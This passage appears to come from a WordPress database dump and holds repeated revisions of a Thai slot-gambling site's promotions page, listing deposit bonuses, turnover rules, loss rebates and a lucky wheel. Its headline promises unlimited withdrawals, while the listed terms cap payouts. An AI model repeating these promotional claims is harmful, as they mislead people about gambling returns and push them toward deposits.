ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 13:38:54','2025-10-23 13:38:54','',27,'https://megabet333.biz/?p=163',0,'revision','',0),(164,3,'2025-10-23 13:38:54','2025-10-23 13:38:54','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 13:38:54','2025-10-23 13:38:54','',27,'https://megabet333.biz/?p=164',0,'revision','',0),(165,3,'2025-10-25 06:10:17','2025-10-25 06:10:17','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" 